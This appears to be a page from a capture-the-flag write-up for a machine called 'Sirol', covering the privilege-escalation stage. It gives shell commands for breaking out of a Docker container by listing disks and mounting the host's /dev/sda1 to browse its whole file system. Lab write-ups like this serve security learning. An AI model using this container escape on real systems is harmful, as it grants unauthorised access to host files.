🐧
Sirol
  • Sirol
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • 5601 Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • Other Services
      • SSH
      • MYSQL
  • Exploitation
  • Priv Escalation
  • Notes
Powered by GitBook
On this page

Priv Escalation

PreviousExploitationNextNotes

Last updated 2 years ago

Breaking out of docker environment

List disks this way:

fdisk -l 

mkdir /mnt/own
mount /dev/sda1 /mnt/own
cd /mnt/own

Once we do that we can browse the entire file system as nothing.